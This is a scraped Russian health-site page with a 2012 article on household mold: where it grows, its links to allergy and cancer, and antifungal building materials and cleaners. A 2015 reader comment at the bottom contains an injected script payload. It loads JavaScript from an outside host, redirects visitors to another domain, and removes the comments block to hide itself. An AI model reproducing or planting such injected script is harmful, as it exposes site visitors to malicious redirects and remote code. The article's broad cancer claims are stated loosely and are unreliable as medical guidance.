Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Плесень в нашем доме  >>  Плесень в нашем доме
 
Обратная связь
 

Плесень в нашем доме

Размер шрифта
16 марта 2012 10:00
  • google_analytics: false
  • Нравится

Что такое плесень, и так ли она безобидна, как может показаться? Где обитает плесень и чем она может грозить нашему здоровью?

 

1

Что такое плесень

Плесень – это гриб, система корневищ, соединенная в плесневой мицелий. Споры у плесени могут летать везде и осаждаться в любом месте. Главное, что важно для роста плесени – влага, тепло и основа, которая будет ее питать (продукты и другие органические источники). Грибки, вызывающие плесень, бывают нескольких видов и у каждого из них в наших домах есть свои излюбленные места обитания.

1

1
На фото: макросъемка плесени

Места в нашем доме, где чаще всего появляется плесень

  • Сырая стена под обоями, особенно в теплом помещении, – первое место для обитания плесени. Также плесень любит селиться на задней стенке буфета, шкафа или любой другой старой мебели.
1
  • Вентиляционные каналы, или вытяжка. Если хозяйки иногда и протирают сетку вытяжки от пыли, то редко кто из них заглядывает внутрь вентиляционного канала, а там кроме пыли и осевшего жира обязательно присутствует плесень.
1
  • Почва комнатных растений. Плесень в почве живет всегда, потому что это естественная среда обитания плесени. Не питайте иллюзий на счет того, что плесневых грибков там нет.

Чем опасна плесень

Бытовая плесень, независимо от вида грибка, – одна из главных причин аллергии и у детей, и у взрослых. Аллергии на антигены грибковой природы занимают примерно 30 % всех аллергий, к примеру, пищевая аллергия занимает лишь 14 % от общего количества случаев.

Некоторые виды плесневых грибов выделяют опасные вещества, которые описаны в медицине как канцерогены. И та плесень, которая живет в вентиляционных каналах, повышает риск развития рака.

Вывод

Плесень может привести к аллергии и раку.

Способы борьбы с грибками в доме

С тех пор как изобрели фунгициды – препараты, убивающие грибы, - наша жизнь наладилась и в медицине, и в быту.

Разработаны новые строительные материалы, на которых грибки не могут жить. Эти материалы (панели, обои, древесина и др.) либо не пригодны для питания и жизни грибков, либо содержат в своем составе пропитку с фунгицидными веществами.

1

Что делать

  • Планируя ремонт, подумайте о новейших строительных материалах с фунгицидами в составе, которые защитят ваш дом от плесени.
  • Проводя уборку, обрабатывайте опасные места специальными средствами, содержащими противогрибковые компоненты.
  • Применяйте противогрибковые средства для обработки поверхностей (стен, дерева и т.д.).



Сюжеты по теме:
Плесень и рак

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.